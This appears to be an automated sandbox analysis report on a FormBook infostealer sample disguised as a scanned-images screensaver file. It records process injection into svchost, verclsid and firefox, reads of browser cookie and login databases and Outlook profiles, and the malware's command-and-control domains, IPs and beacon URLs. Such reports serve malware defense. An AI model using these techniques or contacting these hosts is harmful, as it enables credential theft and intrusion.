                Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
                Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
                Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
                Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
                Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
                Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
                Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
                Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
                Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
                Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
                Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
                Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
                Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\verclsid.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\verclsid.exeSection loaded: NULL target: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\verclsid.exeSection loaded: NULL target: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\verclsid.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\verclsid.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\verclsid.exeThread register set: target process: 7948Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\verclsid.exeThread APC queued: target process: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2C74008Jump to behavior
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004B1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_004B1201
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_00492BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00492BA5
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004BB226 SendInput,keybd_event,0_2_004BB226
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004D22DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_004D22DA
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe"Jump to behavior
                Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exeProcess created: C:\Windows\SysWOW64\verclsid.exe "C:\Windows\SysWOW64\verclsid.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\verclsid.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004B0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_004B0B62
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004B1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_004B1663
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exe, zalkpCfMwtnpQo.exe, 00000002.00000002.3549061384.00000000013D0000.00000002.00000001.00040000.00000000.sdmp, zalkpCfMwtnpQo.exe, 00000002.00000000.1752088734.00000000013D0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: zalkpCfMwtnpQo.exe, 00000002.00000002.3549061384.00000000013D0000.00000002.00000001.00040000.00000000.sdmp, zalkpCfMwtnpQo.exe, 00000002.00000000.1752088734.00000000013D0000.00000002.00000001.00040000.00000000.sdmp, zalkpCfMwtnpQo.exe, 00000007.00000000.1908407918.0000000001910000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: zalkpCfMwtnpQo.exe, 00000002.00000002.3549061384.00000000013D0000.00000002.00000001.00040000.00000000.sdmp, zalkpCfMwtnpQo.exe, 00000002.00000000.1752088734.00000000013D0000.00000002.00000001.00040000.00000000.sdmp, zalkpCfMwtnpQo.exe, 00000007.00000000.1908407918.0000000001910000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: zalkpCfMwtnpQo.exe, 00000002.00000002.3549061384.00000000013D0000.00000002.00000001.00040000.00000000.sdmp, zalkpCfMwtnpQo.exe, 00000002.00000000.1752088734.00000000013D0000.00000002.00000001.00040000.00000000.sdmp, zalkpCfMwtnpQo.exe, 00000007.00000000.1908407918.0000000001910000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_00470698 cpuid 0_2_00470698
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004C8195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_004C8195
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004AD27A GetUserNameW,0_2_004AD27A
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_0048BB6F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_0048BB6F
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004542DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_004542DE

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.3548246487.0000000003320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3548136805.00000000032D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3551901085.0000000005770000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3547874217.0000000003020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1829643197.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1835373056.00000000091A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1830333241.0000000005AE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3549362625.0000000004810000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\verclsid.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\verclsid.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\verclsid.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\verclsid.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\verclsid.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\verclsid.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\verclsid.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\verclsid.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\verclsid.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exeBinary or memory string: WIN_81
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exeBinary or memory string: WIN_XP
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exeBinary or memory string: WIN_XPe
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exeBinary or memory string: WIN_VISTA
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exeBinary or memory string: WIN_7
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exeBinary or memory string: WIN_8

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.3548246487.0000000003320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3548136805.00000000032D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3551901085.0000000005770000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3547874217.0000000003020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1829643197.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1835373056.00000000091A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1830333241.0000000005AE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3549362625.0000000004810000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004D1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_004D1204
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004D1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_004D1806

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		1
                Native API                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		4
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts                		1
                Abuse Elevation Control Mechanism                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		3
                Obfuscated Files or Information                		NTDS116
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                DLL Side-Loading                		LSA Secrets241
                Security Software Discovery                		SSH3
                Clipboard Data                		Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection                		2
                Valid Accounts                		Cached Domain Credentials12
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Virtualization/Sandbox Evasion                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation                		Proc Filesystem1
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1590590 Sample: Scanned-IMGS_from NomanGrou... Startdate: 14/01/2025 Architecture: WINDOWS Score: 100 28 xpremio.online 2->28 30 www.thesquare.world 2->30 32 19 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Antivirus detection for URL or domain 2->44 46 Antivirus / Scanner detection for submitted sample 2->46 48 7 other signatures 2->48 10 Scanned-IMGS_from NomanGroup IDT.scr.exe 1 2->10         started        signatures3 process4 signatures5 60 Binary is likely a compiled AutoIt script file 10->60 62 Writes to foreign memory regions 10->62 64 Maps a DLL or memory area into another process 10->64 13 svchost.exe 10->13         started        process6 signatures7 66 Maps a DLL or memory area into another process 13->66 16 zalkpCfMwtnpQo.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 verclsid.exe 13 16->19         started        process10 signatures11 50 Tries to steal Mail credentials (via file / registry access) 19->50 52 Tries to harvest and steal browser information (history, passwords, etc) 19->52 54 Modifies the context of a thread in another process (thread injection) 19->54 56 3 other signatures 19->56 22 zalkpCfMwtnpQo.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.nexula.website 67.223.117.142, 57374, 57395, 57411 VIMRO-AS15189US United States 22->34 36 xpremio.online 84.32.84.32, 57616, 57617, 57618 NTT-LT-ASLT Lithuania 22->36 38 7 other IPs or domains 22->38 58 Found direct / indirect Syscall (likely to bypass EDR) 22->58 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                Scanned-IMGS_from NomanGroup IDT.scr.exe36%VirustotalBrowse
                Scanned-IMGS_from NomanGroup IDT.scr.exe45%ReversingLabsWin32.Backdoor.FormBook
                Scanned-IMGS_from NomanGroup IDT.scr.exe100%AviraDR/AutoIt.Gen8
                Scanned-IMGS_from NomanGroup IDT.scr.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.scottconsults.top/qjug/0%Avira URL Cloudsafe
                http://quickcommerce.cloud/rdfj/?wz4=W22N1n9VK5BsDegKssi59d1tdmClQzQM6krhrjkO5qQUOhZ23fqPP0igRbfRb/L0%Avira URL Cloudsafe
                http://www.nexula.website/ro4w/100%Avira URL Cloudmalware
                http://www.2q33e.top/dim8/?wz4=SI5ZCVgJbtC8ikIAaDbl0c4+a+swA4Oej6uVn92gSwZctgLMHnh4qXUXZe4N7Wh4DCFNfNClZUM8FDTYBsBE5loeshCr6I6FGtX7Gz1ZeQkIvaXZY4DJTLc=&OvV=2njD6f80EDOLQ80%Avira URL Cloudsafe
                http://www.prediksipreman.fyi/rpjd/?wz4=yOJpbVbkgz0HtUwQYARMSThcLcopmrPoDVX6GqNwoWWXZF3pcIj1Y13LV6gW4nMVJ2J858d+IDhJ+laaNqfHK1c6MutgW040XFAhxno1AdPNbACR1ywEbhk=&OvV=2njD6f80EDOLQ80%Avira URL Cloudsafe
                http://www.livingslab.net/otgv/?wz4=mPj2soEUEFmq5Xu56Ev9ENs/GIe87AemMTFSPosGtz7M/tXNad3AOcc3teRO2drll+qYOuNJorQ/HJUWSqoYkO/lFhsMOlB8p4kTaBK5nEPe9NarMUavWdI=&OvV=2njD6f80EDOLQ80%Avira URL Cloudsafe
                http://www.quickcommerce.cloud/rdfj/0%Avira URL Cloudsafe
                http://www.2q33e.top/dim8/0%Avira URL Cloudsafe
                http://www.prediksipreman.fyi/rpjd/0%Avira URL Cloudsafe
                http://www.scottconsults.top/qjug/?wz4=VcMkcuIRceq81+g9yOCv0sbld0olDHkRvlNhYh95NOpnwjcC/r1DFPFDhAQ/BZSpNAD5Fbv04pxr6m2h9PMUHq+9H+1HT0zuQhfUSGVBQeWRfQVA8fdlyIU=&OvV=2njD6f80EDOLQ80%Avira URL Cloudsafe
                http://www.wddb97.top/p75v/?OvV=2njD6f80EDOLQ8&wz4=GLmvlUrKOeNEevY3wcyfjSkNrwRDbMR2/x32zMvR34mmT0X9ObY05SVA9W4yUMrr2Yq11ERvKU6w2wYb4X7EbFt4LfTn3Wu5NGMirqATx7GUx0yxlSOAJso=100%Avira URL Cloudmalware
                http://www.quickcommerce.cloud/rdfj/?wz4=W22N1n9VK5BsDegKssi59d1tdmClQzQM6krhrjkO5qQUOhZ23fqPP0igRbfRb/LgqczUnn1NrDdL/bN6nwlekL5Do//GTuaTPhPlYdtLOoB+gLN1EC4FlrA=&OvV=2njD6f80EDOLQ80%Avira URL Cloudsafe
                http://www.7wkto5nk230724z.click/yysf/100%Avira URL Cloudmalware
                http://www.nexula.website/ro4w/?wz4=c7bs7cBJE/6WeNDz6y7wfs4csA5ai8mWfunIFb5NDUjHoY3en1z9O1W0OakyKWwaCum+/W1z6qbtx3tl+iJ0V9nyUJg4fcAQQsDkMDUAlXZwvkRINEDVO9c=&OvV=2njD6f80EDOLQ8100%Avira URL Cloudmalware
                http://www.wddb97.top/p75v/100%Avira URL Cloudmalware
                http://www.livingslab.net/otgv/0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                2q33e.top
                		38.47.233.52
                		truetrue
                  		unknown
                  scottconsults.top
                  		3.33.130.190
                  		truetrue
                    		unknown
                    wddb97.top
                    		206.119.82.172
                    		truetrue
                      		unknown
                      www.nexula.website
                      		67.223.117.142
                      		truetrue
                        		unknown
                        www.thesquare.world
                        		13.248.169.48
                        		truetrue
                          		unknown
                          quickcommerce.cloud
                          		20.244.96.65
                          		truetrue
                            		unknown
                            prediksipreman.fyi
                            		162.0.215.244
                            		truetrue
                              		unknown
                              www.7wkto5nk230724z.click
                              		104.21.3.193
                              		truetrue
                                		unknown
                                xpremio.online
                                		84.32.84.32
                                		truetrue
                                  		unknown
                                  livingslab.net
                                  		3.33.130.190
                                  		truetrue
                                    		unknown
                                    www.prediksipreman.fyi
                                    		unknown
                                    		unknownfalse
                                      		unknown
                                      15.164.165.52.in-addr.arpa
                                      		unknown
                                      		unknownfalse
                                        		high
                                        www.wddb97.top
                                        		unknown
                                        		unknownfalse
                                          		unknown
                                          www.revolutionmusic.net
                                          		unknown
                                          		unknownfalse
                                            		unknown
                                            www.livingslab.net
                                            		unknown
                                            		unknownfalse
                                              		unknown
                                              www.xpremio.online
                                              		unknown
                                              		unknownfalse
                                                		unknown
                                                www.quickcommerce.cloud
                                                		unknown
                                                		unknownfalse
                                                  		unknown
                                                  www.cybermisha.store
                                                  		unknown
                                                  		unknownfalse
                                                    		unknown
                                                    www.2q33e.top
                                                    		unknown
                                                    		unknownfalse
                                                      		unknown
                                                      www.xtelify.tech
                                                      		unknown
                                                      		unknownfalse
                                                        		unknown
                                                        www.scottconsults.top
                                                        		unknown
                                                        		unknownfalse
                                                          		unknown

                                                          Contacted URLs

                                                          NameMaliciousAntivirus DetectionReputation
                                                          http://www.nexula.website/ro4w/true
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.scottconsults.top/qjug/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.prediksipreman.fyi/rpjd/?wz4=yOJpbVbkgz0HtUwQYARMSThcLcopmrPoDVX6GqNwoWWXZF3pcIj1Y13LV6gW4nMVJ2J858d+IDhJ+laaNqfHK1c6MutgW040XFAhxno1AdPNbACR1ywEbhk=&OvV=2njD6f80EDOLQ8true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.2q33e.top/dim8/?wz4=SI5ZCVgJbtC8ikIAaDbl0c4+a+swA4Oej6uVn92gSwZctgLMHnh4qXUXZe4N7Wh4DCFNfNClZUM8FDTYBsBE5loeshCr6I6FGtX7Gz1ZeQkIvaXZY4DJTLc=&OvV=2njD6f80EDOLQ8true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.quickcommerce.cloud/rdfj/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
